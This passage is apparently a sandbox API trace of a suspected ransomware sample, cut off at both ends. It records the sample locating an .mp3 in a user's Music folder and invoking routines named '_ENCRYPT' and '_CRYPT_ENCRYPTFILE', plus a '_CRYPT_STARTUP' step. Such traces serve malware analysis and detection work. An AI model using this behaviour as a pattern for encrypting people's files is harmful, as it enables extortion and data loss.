Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.025] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0186.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.026] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.026] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0186.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.026] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.026] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.026] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.026] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.026] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.026] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0x90add8 [0186.027] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0x90add8 [0186.028] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GfFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fFOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FOaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oaa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aa4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKoP0.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.032] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.032] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.032] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.032] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.033] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.033] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.033] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.033] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.033] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf51d2450, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0xc396bae0, ftLastAccessTime.dwHighDateTime=0x1d5d8a0, ftLastWriteTime.dwLowDateTime=0xc396bae0, ftLastWriteTime.dwHighDateTime=0x1d5d8a0, nFileSizeHigh=0x0, nFileSizeLow=0xb998, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="pKoP0.mp3", cAlternateFileName="")) returned 0x90ae18 [0186.033] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.033] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.033] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.033] PeekMessageW (in: 